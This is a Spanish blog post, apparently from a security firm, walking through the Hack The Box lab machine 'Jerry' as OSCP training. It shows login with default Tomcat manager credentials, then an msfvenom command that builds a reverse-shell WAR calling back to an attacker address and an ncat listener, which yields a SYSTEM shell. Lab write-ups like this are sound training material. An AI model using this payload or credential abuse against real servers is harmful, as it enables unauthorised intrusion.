Road to OSCP - Hack The Box Write Up - Jerry

Blog

22
- Junio
2019
Road to OSCP - Hack The Box Write Up - Jerry

Hack the Box es una plataforma en línea para probar y mejorar tus habilidades en pruebas de penetración y ciberseguridad.

En esta serie de artículos mostraremos cómo los evaluadores junior completan algunas máquinas de Hack The Box en su camino hacia OSCP, una certificación muy conocida, respetada y requerida para muchos puestos de ciberseguridad. Los certificados OSCP son capaces de identificar las vulnerabilidades existentes y ejecutar ataques organizados de manera controlada. Pueden aprovechar o modificar el código de exploits existentes en su beneficio, realizar pivoting en la red y exfiltrar datos, y comprometer los sistemas debido a configuraciones deficientes.

¡Empecemos con la diversión!

Jerry

Initial Foothold

Al enumerar la página web en el puerto 8080 nos encontramos con http://10.10.10.95:8080/manager/status. Pide autenticación y si hacemos clic en cancelar, recibimos un 401 (no autorizado).

Sin embargo, el mensaje da un ejemplo de cómo añadir credenciales a la configuración del Tomcat: tomcat:s3cret. Resulta que esas son credenciales realmente válidas para entrar en esa misma página.

401 mensaje (truncated)

Si no ha cambiado ningún archivo de configuración, por favor examine el archivo conf/tomcat-users.xml en su instalación. Ese archivo debe contener las credenciales para permitirle usar esta aplicación web.

Por ejemplo, para añadir el rol de admin-gui a un usuario llamado tomcat con una contraseña de s3cret, añada lo siguiente al archivo de configuración que aparece arriba.

Así que nos las arreglamos para acceder al estado del servidor. Tiene un montón de información:

  • Apache Tomcat Versión 7.0.88.
  • Nombre del OS: Servidor Windows 2012 R2.
  • Arquitectura del Os: amd64.
  • Versión de Os: 6.3.
  • Versión de la JVM: 1.8.0_171-b11.
  • Nombre de host: JERRY.

Root

Si ahora vamos a http://jerry:8080/manager/html/list, encontramos que podemos subir archivos de WAR. Tal vez podemos explotar esto de alguna manera.

Sí, podemos, siguiendo este blog.

  1. Generar payload: msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.17 LPORT=6969 -f war > shell.war.
  2. Configurar el puerto escucha: ncat -lnvp 6969.
  3. Sube el archivo shell.war.
  4. Nuestro archivo debería aparecer ahora en la lista, haga clic en el nombre.

Hemos creado con éxito un shell como nt authority\system.

Ángel Guzmán/Evaluador Junior

Grado y Master en Ingeniería de Tecnologías de Telecomunicación por la Universidad de Granda, especializado en telématica. Se unió a jtsec en noviembre de 2019 como evaluador de ciberseguridad Junior.

Desde su unión a jtsec, ha participado en varios proyectos internos de hardware hacking y ha recibido formación sobre la certificación LINCE.

Su principal motivación es aprender, desde pequeñas herramientas para su trabajo diario hasta nuevas tecnologías.


Contacto

¡Envíanos tus dudas o sugerencias!

Al enviar tus datos nos permites que los usemos para resolver tus dudas enviándote información comercial de tu interés. Los suprimiremos cuando dejen de ser necesarios para esto. Infórmate de tus derechos en nuestra Política de Privacidad.